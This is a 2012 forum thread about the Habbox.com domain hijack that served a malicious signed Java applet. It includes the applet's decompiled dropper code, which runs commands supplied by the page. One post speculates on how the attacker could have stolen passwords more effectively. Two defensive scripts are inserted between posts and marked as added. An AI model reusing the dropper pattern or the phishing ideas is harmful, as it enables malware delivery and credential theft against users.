Habbox DOT com ~ Site



GoldenMerc
04-06-2012, 11:46 AM
Hi,

So just sort of confused at the minute with this announcement;
http://www.habboxforum.com/showthread.php?t=750209
Which says;

We are currently aware of the problems people are facing with Habbox.com. If you go to the website and you get a Java Warning then DO NOT RUN the java or EXE application under any circumstances.

We recommend EVERYONE resets their passwords for any services that use the same password as their Habbox.com account and to reset their Habbox.com passwords once we give the go ahead after regaining control of the domain.

Update (22:41): We have suspended the Habbox.com website while we deal with the situation.

Update (23:14): We are currently working with Namecheap to try and resolve the issue. The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.

Update (00:41): Whilst normally a second person would have access to the domain accounts, it has been rather unfortunate timing and as such we are currently waiting for news from Sierk.

Update (11:08): We have made contact with Sierk and anticipate Habbox coming back online soon.


Pretty much it runs an exe file onto your PC, guess that's extremely dangerous, but how did this all happen, how did Habbox get so badly compromised? You said you were working with NameCheap to resolve the issue, what issue?
Ross

Recursion
04-06-2012, 11:47 AM
Read the second update in that post...

Basically they managed to convince Namecheap to point the habbox.com domain elsewhere... someone made a clone of the Habbox.com site on their own server (and did a terrible job, tbh).

xxMATTGxx
04-06-2012, 11:48 AM
Read the second update in that post...

What he said, I'll quote it so you can see it clearly:


Update (23:14): We are currently working with Namecheap to try and resolve the issue. The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.

GoldenMerc
04-06-2012, 11:48 AM
Read the second update in that post...


The issue is with the Habbox.com DNS information and NO information has been leaked from our servers or databases unless you put your information into the site during this time.


Hardly explains anything?

xxMATTGxx
04-06-2012, 11:49 AM
Hardly explains anything?

Basically they managed to convince Namecheap to point the habbox.com domain elsewhere... someone made a clone of the Habbox.com site on their own server (and did a terrible job, tbh).

GoldenMerc
04-06-2012, 11:51 AM
I'm sure this has happened before, actually I'm really sure this has happened before. How the hell are Namecheap believing this crap, I'm fairly sure this should be taken to court, it's up to Jin at the end of the day but that's terrible security.

Nick.
04-06-2012, 11:51 AM
So your domain provider basically let a stranger change the DNS? Wow.

Kieran
04-06-2012, 11:55 AM
I'm sure this has happened before, actually I'm really sure this has happened before. How the hell are Namecheap believing this crap, I'm fairly sure this should be taken to court, it's up to Jin at the end of the day but that's terrible security.

The domains are still owned by Sierk, not Jin which is why it is taking some time to regain complete control of the DNS servers.


So your domain provider basically let a stranger change the DNS? Wow.

Pretty much.

GoldenMerc
04-06-2012, 12:06 PM
Bit crazy how Namecheap allowed this to happen, I'd expect a misunderstanding like this to come from a smaller site etc, but a huge site like NameCheap... bit disappointing. As I said I thought this happened before, surely there is a way to prevent this from happening, e.g. to get your password back for your NameCheap account you can attach a home phone number or something?!

Kieran
04-06-2012, 12:08 PM
Bit crazy how Namecheap allowed this to happen, I'd expect a misunderstanding like this to come from a smaller site etc, but a huge site like NameCheap... bit disappointing. As I said I thought this happened before, surely there is a way to prevent this from happening, e.g. to get your password back for your NameCheap account you can attach a home phone number or something?!

It's not quite as simple as that. With Sierk still having control of the domains it took some time for Jin to get hold of him. Thankfully he has managed to do so now. I'd anticipate the domain being back in Sierk's control at some point this afternoon. If Jin had ownership it wouldn't have taken so long as we are in easy contact with him.

Recursion
04-06-2012, 12:09 PM
The Namecheap account hasn't been compromised... Jin normally has access but doesn't at the moment, hence we have to wait for Sierk to give Jin the details.

Grig
04-06-2012, 12:09 PM
how in the world did it get to that. I also feel bad for those who only visit the site, click run and then might get a virus. Not gooooood

GoldenMerc
04-06-2012, 12:11 PM
So if the Namecheap account hasn't been compromised how on earth did NameCheap fall for giving it to another NameCheap account? Like what the hell?

iAdam
04-06-2012, 12:13 PM
how in the world did it get to that. I also feel bad for those who only visit the site, click run and then might get a virus. Not gooooood

We'll make sure to get an announcement up when we get the site back and running.


So if the Namecheap account hasn't been compromised how on earth did NameCheap fall for giving it to another NameCheap account? Like what the hell?

This, this is a very good question and one that we have been asking all night.

GoldenMerc
04-06-2012, 12:15 PM
Not going to lie, now you've made me feel pretty scared about my domains on NameCheap. I'll definitely be bringing up a way to prevent this, or totally leave NameCheap myself.

Grig
04-06-2012, 12:15 PM
So if the Namecheap account hasn't been compromised how on earth did NameCheap fall for giving it to another NameCheap account? Like what the hell?

That's it. Basically how can we rely on NameCheap if they so easily give out accounts. Unless they had overwhelming evidence of proof.

GoldenMerc
04-06-2012, 12:17 PM
That's it. Basically how can we rely on NameCheap if they so easily give out accounts. Unless they had overwhelming evidence of proof.

Don't really care how much proof he had, should be phone line support or something similar considering this is such a big sector in IT development, domains are everything

iLogan
04-06-2012, 12:21 PM
Are the domains going to be transferred to another provider?

GoldenMerc
04-06-2012, 12:22 PM
Are the domains going to be transferred to another provider?

Thing is, in my eyes I can't see much other way to protect them moving provider. I think Namecheap & GoDaddy are definitely the biggest but I'm completely confused how this happened still. Wonder what information the "hacker" gave

Samantha
04-06-2012, 12:25 PM
Do we know if the hacker was a Habbox member or a staff member etc. I didn't realise it was that big a security risk and it is Sod's law that Jin didn't have access yet.

GoldenMerc
04-06-2012, 12:27 PM
Do we know if the hacker was a Habbox member or a staff member etc. I didn't realise it was that big a security risk and it is Sod's law that Jin didn't have access yet.

Got news from FBI it's someone called Samanfa, but we're working on it for u.
Prob was an insider to be fair, all depends on what information they had, quite a lot of it was most likely public anyways. I mean it's not hard to find Sierk's name, address, email etc. Wonder what else they had

iAdam
04-06-2012, 12:28 PM
Do we know if the hacker was a Habbox member or a staff member etc. I didn't realise it was that big a security risk and it is Sod's law that Jin didn't have access yet.

At this point we're trying to find out who changed the DNS. No one except Sierk and Jin had legal access to the accounts and unfortunately Jin doesn't have the access right now.

xxMATTGxx
04-06-2012, 12:32 PM
At this point we're trying to find out who changed the DNS. No one except Sierk and Jin had legal access to the accounts and unfortunately Jin doesn't have the access right now.

Just to add on, we expect it to be back to normal later today. Sierk has been reached.

David
04-06-2012, 12:33 PM
what happened to the down page

GoldenMerc
04-06-2012, 12:35 PM
http://www.mattgarner.net/upload/images/2012/06/04/kgou3.png
Seems downpage is back to this, *******s trying to hack me

Kieran
04-06-2012, 12:35 PM
http://www.mattgarner.net/upload/images/2012/06/04/kgou3.png
Seems downpage is back to this, *******s trying to hack me

The downpage would only stay up whilst your ISP's DNS hadn't changed. Now it's been so many hours nearly everyone's DNS will have updated, hence you all getting directed to that site with the Java exploit. Just don't click run ;)

GoldenMerc
04-06-2012, 12:37 PM
The downpage would only stay up whilst your ISP's DNS hadn't changed. Now it's been so many hours nearly everyone's DNS will have updated, hence you all getting directed to that site with the Java exploit. Just don't click run ;)
Well I had the Habbox downpage a bit earlier, now this is back on, tried clicking Hall of fame to see myself but it wanted to take me to some gaming market site :( n course I wouldn't click run, my name's not babyg 8-)

xxMATTGxx
04-06-2012, 12:40 PM
Well I had the Habbox downpage a bit earlier, now this is back on, tried clicking Hall of fame to see myself but it wanted to take me to some gaming market site :( n course I wouldn't click run, my name's not babyg 8-)

I also wouldn't click it, I'm not stupid!

GoldenMerc
04-06-2012, 12:41 PM
I also wouldn't click it, I'm not stupid!

http://chzmemeanimals.files.wordpress.com/2012/02/advice-animals-memes-first-world-cat-problems-red-dot.jpg

So is Habbox going to move name servers?

Kieran
04-06-2012, 12:47 PM
http://chzmemeanimals.files.wordpress.com/2012/02/advice-animals-memes-first-world-cat-problems-red-dot.jpg

So is Habbox going to move name servers?

I think they need to assess first how it came to be that the nameservers were allowed to be changed.

HotelUser
04-06-2012, 01:14 PM
I'm suddenly glad the domains I own that I care about are registered with go daddy. If they changed the name servers then it's possible they manipulated email accounts. It could be a good idea to contact Sulake (if it's not already even done of course) and specifically tell them to ignore any recent emails they received from Habbox.

Chippiewill
04-06-2012, 01:20 PM
Sierk should switch to SimplexWebs

Also isn't there an option to lock down transfers to the point that Namecheap couldn't move it about even if they wanted to?
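
Relevant to the lock question in this post and to the nameserver change the thread is about, an added example (not part of any post, and not Namecheap's or Habbox's tooling): a check of a domain's RDAP record for changed nameservers and missing update locks. The status strings are the standard RDAP ones; the sample records, baseline, hostnames and finding codes are constructed for illustration.

```javascript
// Added illustration, not code from the thread. Audits one RDAP domain
// object (the JSON an RDAP server returns for a domain) against a baseline
// the owner recorded while the domain was in a known-good state.

// "client ..." statuses are set and lifted by the registrar;
// "server ..." statuses are set by the registry (a registry lock).
const REGISTRAR_UPDATE_LOCK = "client update prohibited";
const REGISTRY_UPDATE_LOCK = "server update prohibited";
// Transfer locks stop a move to another registrar, not a nameserver edit.
const TRANSFER_LOCKS = ["client transfer prohibited", "server transfer prohibited"];

function normalizeName(name) {
  return String(name || "").trim().toLowerCase().replace(/\.$/, "");
}

function nameserversOf(rdap) {
  return (rdap.nameservers || [])
    .map((ns) => normalizeName(ns.ldhName))
    .filter((n) => n !== "")
    .sort();
}

function lastChanged(rdap) {
  const ev = (rdap.events || []).find((e) => e.eventAction === "last changed");
  return ev ? new Date(ev.eventDate) : null;
}

function auditDomain(rdap, baseline) {
  const findings = [];
  const status = new Set((rdap.status || []).map((s) => String(s).toLowerCase()));
  const observed = nameserversOf(rdap);
  const expected = baseline.nameservers.map(normalizeName).sort();

  // 1. Delegation drift: any nameserver added or dropped since the baseline.
  const added = observed.filter((ns) => !expected.includes(ns));
  const missing = expected.filter((ns) => !observed.includes(ns));
  if (added.length > 0 || missing.length > 0) {
    findings.push({ code: "NS_CHANGED", added, missing });
  }

  // 2. The record was modified after the baseline was taken.
  const changed = lastChanged(rdap);
  if (changed && changed > new Date(baseline.recordedAt)) {
    findings.push({ code: "CHANGED_SINCE_BASELINE", at: changed.toISOString() });
  }

  // 3. Lock posture: a registrar-only lock can be lifted by the registrar.
  if (!status.has(REGISTRAR_UPDATE_LOCK) && !status.has(REGISTRY_UPDATE_LOCK)) {
    findings.push({ code: "NO_UPDATE_LOCK" });
  } else if (!status.has(REGISTRY_UPDATE_LOCK)) {
    findings.push({ code: "REGISTRAR_LOCK_ONLY" });
  }
  if (!TRANSFER_LOCKS.some((s) => status.has(s))) {
    findings.push({ code: "NO_TRANSFER_LOCK" });
  }
  return findings;
}

function findingCodes(rdap, baseline) {
  return auditDomain(rdap, baseline).map((f) => f.code);
}

// --- Constructed sample data (not real records) ---
const BASELINE = {
  nameservers: ["ns1.dns-host.example", "ns2.dns-host.example"],
  recordedAt: "2024-05-01T00:00:00Z",
};

const SAMPLE_HEALTHY = {
  objectClassName: "domain",
  ldhName: "example.com",
  status: ["client transfer prohibited", "client update prohibited", "server update prohibited"],
  nameservers: [{ ldhName: "NS1.DNS-HOST.EXAMPLE" }, { ldhName: "ns2.dns-host.example." }],
  events: [{ eventAction: "last changed", eventDate: "2024-04-20T10:00:00Z" }],
};

const SAMPLE_REPOINTED = {
  objectClassName: "domain",
  ldhName: "example.com",
  status: ["client transfer prohibited"],
  nameservers: [{ ldhName: "ns1.other-host.example" }, { ldhName: "ns2.other-host.example" }],
  events: [{ eventAction: "last changed", eventDate: "2024-06-03T21:30:00Z" }],
};

console.log(findingCodes(SAMPLE_HEALTHY, BASELINE));
console.log(findingCodes(SAMPLE_REPOINTED, BASELINE));
```

Run on a schedule against the live record, a non-empty result is the cue to contact the registrar before resolver caches pick up the new delegation.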

GoldenMerc
04-06-2012, 01:21 PM
Sierk should switch to SimplexWebs

Also isn't there an option to lock down transfers to the point that Namecheap couldn't move it about even if they wanted to?

or not...

Calvin
04-06-2012, 01:24 PM
Sierk should switch to SimplexWebs

Also isn't there an option to lock down transfers to the point that Namecheap couldn't move it about even if they wanted to?

Isn't Simplex managed by people who use Habbo forums? If one of them happens to have some sort of grudge against Habbox then err.. :P

GoldenMerc
04-06-2012, 01:25 PM
Isn't Simplex managed by people who use Habbo forums? If one of them happens to have some sort of grudge against Habbox then err.. :P

Yeah, in a way, ClubHabbo people; Recursion is part of their staff tho

---------- Post added 04-06-2012 at 02:27 PM ----------

Please make it so this is dismissable;

HABBOX.COM ISSUES: Please visit THIS THREAD (http://www.habboxforum.com/showthread.php?t=750209) for more information.
I've read it a few times, either way it won't make much of a difference to me :( let me dismiss

scottish
04-06-2012, 01:42 PM
yeah I agree, should have made it dismissable as soon as they put the notice up but mattg wouldn't for some reason, after seeing it 300 times I still have no more interest in it than I did the 5th time I saw it.

and I somewhat highly doubt Namecheap would change the DNS without the user accessing the account, as for someone to email with all of Sierk's info and say "hi I'm Sierk, change my DNS", they'd simply tell him to log into the Namecheap account or reset the information for it, otherwise it kind of ruins the point of having a Namecheap account if you can transfer etc through customer support.

and I fail to see how it's such a huge problem with trust issues with them, in the 8 years or whatever Habbox has been with Namecheap it's happened once (if it even did, fairly sure last time Sierk's account got compromised on Namecheap and no-one blamed the company). If you're not completely inactive and that happened to your domain (which I'm assuming is nowhere near as 'popular' as Habbox for anyone to want to go to that trouble) you'd be able to change the DNS almost instantly instead of waiting 10 hours to get a hold of the owner.

just get sierk to check last login when he goes on namecheap...

Richie
04-06-2012, 03:19 PM
Conspiracy theory. Sierk created a new server, pointed the dns to the new server so he could hack all of our habbo accounts as habbox is running low on funds :P lol jk that's impossible mattg hogs all the furni ;l


On a serious note, question Namecheap on how it happened. Ask them to put a note on the account so if anything like this happens again Namecheap staff won't give in so easily (if that was the case). Either way, they shouldn't have been so stupid.

Logandyer45
04-06-2012, 03:43 PM
So, since everything is down, DJ's are not to DJ? :S Plus, I tried going to it and my AVG blocked a threat.

GoldenMerc
04-06-2012, 03:45 PM
So, since everything is down, DJ's are not to DJ? :S Plus, I tried going to it and my AVG blocked a threat.

Good luck on trying not to DJ;
http://habboxlive.com/
Everything's up except Hx.com.


Plus, I tried going to it and my AVG blocked a threat.
Because there's a virus on there (if you accept the .exe)

Logandyer45
04-06-2012, 03:46 PM
I didn't get offered an .exe ; I x'ed off asap.

GoldenMerc
04-06-2012, 03:47 PM
AVG most likely blocked it for you, the site's not very interesting to be fair. no pages work :( tried going through them all

Logandyer45
04-06-2012, 03:49 PM
I tried looking at the events. I need to know if there are any events going on. :P

GoldenMerc
04-06-2012, 03:50 PM
Yeah, that's definitely not possible as the habbox.com domain is messed up atm, well it is for my provider, may not be for yours

xxMATTGxx
04-06-2012, 03:51 PM
I tried looking at the events. I need to know if there are any events going on. :P

It would be best to look at the community notice board in regards of events! :P

Chippiewill
04-06-2012, 03:51 PM
It's actually pretty easy to get on the main site if you really need it for some reason http://146.185.20.107/#!/Home

Stephen
04-06-2012, 05:18 PM
whoever it is his name is phil

Samantha
04-06-2012, 05:26 PM
whoever it is his name is phil
Dilusionate; what you been doing to Habbox? :P

Recursion
04-06-2012, 05:31 PM
I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

Hecktix
04-06-2012, 05:38 PM
A further problem made 10x worse by Habbox's owners being inactive, how many times do people need to say it: GIVE xxMATTGxx ACCESS TO THE LOT.

Tomm
04-06-2012, 05:47 PM
There is no java exploit. Here is the decompiled code:



import java.applet.Applet;
import java.io.IOException;

public class Client extends Applet
{
    public void init()
    {
        // Command strings are read from the <param> values that the
        // hosting page supplies to the applet; none are hard-coded here.
        String window1 = getParameter("windows1");
        String windows2 = getParameter("windows2");
        String linux1 = getParameter("linux1");
        String linux2 = getParameter("linux2");
        String unix1 = getParameter("unix1");
        String unix2 = getParameter("unix2");
        String os = System.getProperty("os.name").toLowerCase();

        // Windows: run both Windows command strings.
        if (os.indexOf("win") >= 0)
        {
            try
            {
                Process w1 = Runtime.getRuntime().exec(window1);
                Process w2 = Runtime.getRuntime().exec(windows2);
            }
            catch (IOException e)
            {
                e.printStackTrace();
            }
        }

        // Mac: run both "unix" command strings.
        if (os.indexOf("mac") >= 0)
        {
            try
            {
                Process u1 = Runtime.getRuntime().exec(unix1);
                Process u2 = Runtime.getRuntime().exec(unix2);
            }
            catch (IOException e)
            {
                e.printStackTrace();
            }
        }

        // Anything that is not Linux stops here.
        if (os.indexOf("lin") < 0) {
            return;
        }

        // Linux: run both Linux command strings.
        try
        {
            Process l1 = Runtime.getRuntime().exec(linux1);
            Process l2 = Runtime.getRuntime().exec(linux2);
        }
        catch (IOException e)
        {
            e.printStackTrace();
        }
    }
}


Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.


I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

Recursion
04-06-2012, 05:50 PM
I don't have any experience with Java, so it was a guess. From looking at the traffic these processes are using it's an IRC controlled botnet... could be wrong but that's what it seems like to me in my VM.


There is no java exploit. Here is the decompiled code:





Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

iAdam
04-06-2012, 05:50 PM
There is no java exploit. Here is the decompiled code:





Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.


Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the gist of what Recursion said.

Tomm
04-06-2012, 06:01 PM
I'm not arguing. Just was pointing out that there is no Java exploit, which is hardly pedantic. It would be a lot more serious if there was some exploit that bypassed Java's security model. The way it is currently handled is how it is designed - the user needs to give explicit permission for anything bad to happen.


Not sure if being pedantic or arguing for the sake of it.

But yeah, you get the gist of what Recursion said.

Phil
04-06-2012, 08:48 PM
whoever it is his name is phil


@Dilusionate (http://www.habboxforum.com/member.php?u=67954); what you been doing to Habbox? :P

HUH? D:

Chippiewill
04-06-2012, 09:38 PM
A further problem made 10x worse by Habbox's owners being inactive, how many times do people need to say it: GIVE xxMATTGxx ACCESS TO THE LOT.

I'm actually not entirely sure what this is meant to achieve, Matt is hardly super server admin, sure he's more technically adept than most but stuff like that has never been the General Manager's responsibility. From what I've heard a lot of the past restrictions on access are being eased anyway but to say that Matt should have access to control Habbox's domain is insane. Jin is actually being more reachable recently than he has in the past and from what I understand Sierk was reachable for this also. Just because they're not making daily posts on the forum does not mean they're inactive.

HotelUser
04-06-2012, 11:26 PM
There is no java exploit. Here is the decompiled code:





Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.

Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites are also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could have just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could have had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff members' Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whoever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here). I'm also going to confess that leading up to my resignation I spoke to (harassed for hours on end) Matt about talking to Jin in order to get Tom root access to the server. Though not helpful in a circumstance as this one, if (god forbid) a different hacking situation came up, Tom would be here, fully capable, of resolving the issue. Jin agreed to allow Tom such access and I'm not sure if he's still getting it but I believe it would be very beneficial in resolving a hacking situation, or with maintaining server uptime, or with just plain old having it to help him with web development.

Another interesting (sort of clever) security idea which would help in situations like this, would be to include a JavaScript file on each Habbox Domain hosted on a non Habbox website (for instance, since I'm fairly certain all/most Habbox websites use jQuery, it would be a good idea to include jQuery hosted on another domain entirely). This way, if the hacker is stupid like this one, when they rip the website it will still link to this third party JavaScript file which a Habbox developer could then simply stick a window.location in and create a *temporary* fix to the problem. This is also a good idea because I've looked at Habbox's Google Analytics before and I've seen and reported (causing them to be shut down), 3 other websites which all stole interface designs from Habbox. Many thieves are careless and would leave these external JavaScript inclusions intact (especially ones innocent looking like an inclusion to jQuery), so this could be a very useful method of redirecting users back onto Habbox soil where they could read a message in big red letters to not allow the Java code to run.
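
A sketch of the externally hosted tripwire script described in this post, as an added example that is not part of the original post or Habbox's code: it decides, from the hostname of the page that loaded it, whether to send the visitor to the announcement thread. The allow-list, the incident list and the function names are assumptions; the notice URL is the announcement thread linked earlier in the thread.

```javascript
// Added illustration. This file would be served from a domain whose DNS is
// independent of habbox.com and included by every Habbox page, so a ripped
// copy of the markup keeps loading it.

const ALLOWED_DOMAINS = ["habbox.com", "habboxforum.com", "habboxlive.com"];
const NOTICE_URL = "http://www.habboxforum.com/showthread.php?t=750209";

// Hypothetical incident switch, empty in normal operation. During a DNS
// hijack the clone is served under the real hostname, so an allow-list
// check alone passes; staff list the affected domain here instead.
const UNTRUSTED_DOMAINS = [];

function normalizeHost(hostname) {
  return String(hostname || "").trim().toLowerCase().replace(/\.$/, "");
}

// True for the domain itself and its subdomains, matched on a dot boundary
// so "nothabbox.com" and "habbox.com.evil.example" do not pass.
function underDomain(hostname, domain) {
  const host = normalizeHost(hostname);
  const d = normalizeHost(domain);
  return host !== "" && d !== "" && (host === d || host.endsWith("." + d));
}

// Returns the URL to redirect to, or null to leave the visitor alone.
function decideRedirect(hostname, untrusted = UNTRUSTED_DOMAINS) {
  const host = normalizeHost(hostname);
  if (host === "") return null; // local file preview, nothing to judge

  // Never redirect the notice page to itself (avoids a redirect loop).
  if (host === normalizeHost(new URL(NOTICE_URL).hostname)) return null;

  // Incident mode: the real hostname currently resolves to a clone.
  if (untrusted.some((d) => underDomain(host, d))) return NOTICE_URL;

  // Normal mode: the markup is being served from a domain that is not ours.
  if (!ALLOWED_DOMAINS.some((d) => underDomain(host, d))) return NOTICE_URL;

  return null;
}

// Browser hook; skipped when the file is loaded outside a browser.
if (typeof window !== "undefined" && window.location) {
  const target = decideRedirect(window.location.hostname);
  if (target) window.location.replace(target);
}
```

Because the file's contents have to change during an incident, the including `<script>` tag cannot pin it with Subresource Integrity, so the third-party host becomes a trusted dependency of every page that loads it.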

jasey
04-06-2012, 11:38 PM
I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

GommeInc
04-06-2012, 11:38 PM
B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in :P

Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology - or demand a whipping seeing as how poorly they've handled the domains :/

This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.

Recursion
04-06-2012, 11:39 PM
I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.

Chippiewill
04-06-2012, 11:39 PM
The author of that snippet of code should be ashamed of themselves, and should learn when to use if statements, how to use an else if statement, and should also learn to check when indexOf is equal to -1 when a match is not found, instead of checking when it's equal to or greater than zero when a match is found.
Now now, you shouldn't criticise code in public.


Not only is the "hacker" a lazy / unintelligent Java developer, but their skills at ripping websites are also really lame. They weren't smart enough to consider for a moment to rip images, stylesheets and JavaScript, OR to just slap an iframe of Habbox displaying the real Habbox via the IP chip posted. If they spent several hours they could have written a very simple and functional version of Habbox.com, using sockets on the backend to communicate with the actual Habbox in order to provide functionality. Heck, they could have just done the iFrame thing, and then made something cute with hashtags to make it look like links did something. If they had done any of these things (but especially the socket or last thing) then they could have had us fooled for days. If they played their cards correctly they could have stolen passwords to user and staff members' Habbox.com accounts, which could have been the same as staff forum or email accounts, and then they would have had a field day.

It is exorbitantly clear to me that whoever is responsible for this is a moron and did Habbox a favour by doing this as a moron because their little trick could have been a lot more effective if they actually applied their brain to what they were doing, and because now Habbox is going to learn from this to prevent such things from happening in the future.

Anybody who is focusing their efforts on stealing a Habbo domain is obviously not a fantastic hacker, otherwise they'd be going after higher priority targets who handle card data.


Since Jin is a smart man I am fairly certain he's now going to have control over the Habbox.com domain which is great because it prevents a delay in fixing problems like this in the future (I'm also hoping Matt will have jurisdiction over the domain but maybe I'm just daring to dream here).

I believe Jin has control whenever his hard drive isn't broken and I believe Matt himself thinks he doesn't need major access to the domain; apart from rare (and non-existent hopefully after this) events Matt can wait a day or two for Jin to sort stuff.


I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.
I find it hilarious that you kick up a massive fuss when you see a new member of staff breaking a small rule yet Habbox having their domain stolen and destroying user trust is "minor"

xxMATTGxx
04-06-2012, 11:41 PM
I still don't understand how so many people get their jollies obsessing over something so minor as this. It's Habbox, not PayPal. Traffic has been declining for years now and the majority of Habbox's userbase is focused solely on the forum which is also wilted compared to what it once used to be. I get that it's an important site for many people but when something so minor like this happens — if you think habbox.com's nameservers getting redirected is not minor, please do open your eyes to the world around you — I am seriously amazed that there are four, five or six people trying to pick apart what happened as if they were looking for a lost child.

There are two options: NameCheap messed up or sierk messed up. The site is insignificantly profitable if at all and I don't see what the big concern over things are besides for the sake of nostalgia. Someone immature is trying to get access to the personal information of the fourteen year olds that visit Habbox.com who are dumb enough to let the malicious behaviour on to their computer. Is it really worth all of this effort? Warn the users without acting like a nuke is being dropped, fix the problem and move on. I can't stress how unimportant this whole thing is except, perhaps, in the sense that maybe management and owner access needs to be reevaluated. That's about it.

I'm not going to write loads back but anyone who believes this is minor needs to check on what actually happened in the first place.


B&Q have a wonderful sale on at the moment - 50% off all garden tools. Perhaps we could all chip in, buy a load of shovels and we can dig a much deeper hole for Habbox to sit itself in :P

Alternatively, just hire a bus, storm Namecheap and leave no survivors - they're clearly too dumb to live if they change the details of a domain without hesitation. Pretty stupid of them, you demand a good quality service yet they chuck common sense to the wind and leave hundreds (assuming Habbox has hundreds of viewers these days) exposed to these sorts of exploits. I hope you get an apology -or demand a whipping seeing as how poorly they've handled the domains :/

This isn't doing Habbox any good - servers which seem to be enjoying some quiet, down time and now a domain which was carelessly changed to expose users to whatever these Java exploits are attempting to do. Feel sorry for whoever had to grovel to Jin and sierk.

We were discussing in a Skype chat if we should do a raid! (Joking ofc but all good fun) and any future problems with the server will be sorted out very quickly.

GommeInc
04-06-2012, 11:45 PM
We were discussing in a Skype chat if we should do a raid! (Joking ofc but all good fun) and any future problems with the server will be sorted out very quickly.
I bet you're being serious and are just saying it's a joke to appear innocent. Your secret is safe, happy slashing ;)

jasey
04-06-2012, 11:46 PM
I don't think you understand the (very much so) significance of protecting a) your userbase and b) your user's information.

Oh, my dear, yes I do. Is playing "teen tech genius" to the few others who care enough to read in to your message protecting anything? No, it's feeding your ego. Perhaps you get off on exciting (not so clever) takeovers of sagging fansites for an antique online community. Maybe it's very thrilling for you to decide whether or not this can be considered an 'exploit' or not. I guess there is the possibility that when you can't get credibility on a forum dedicated to this sort of thing, it feels good to big up what you read about on a forum that hires staff who post in Spam asking for REP. I really can't be sure.

The point of my post is that the reaction to what happened was melodramatic and this thread is as well. It is not a big deal. It has been done and the userbase's information is safe as of now. There needn't be a sixty post analysis on who dare did this and how in the world they managed this evil plan. It's Habbox, get a grip.

Hecktix
04-06-2012, 11:48 PM
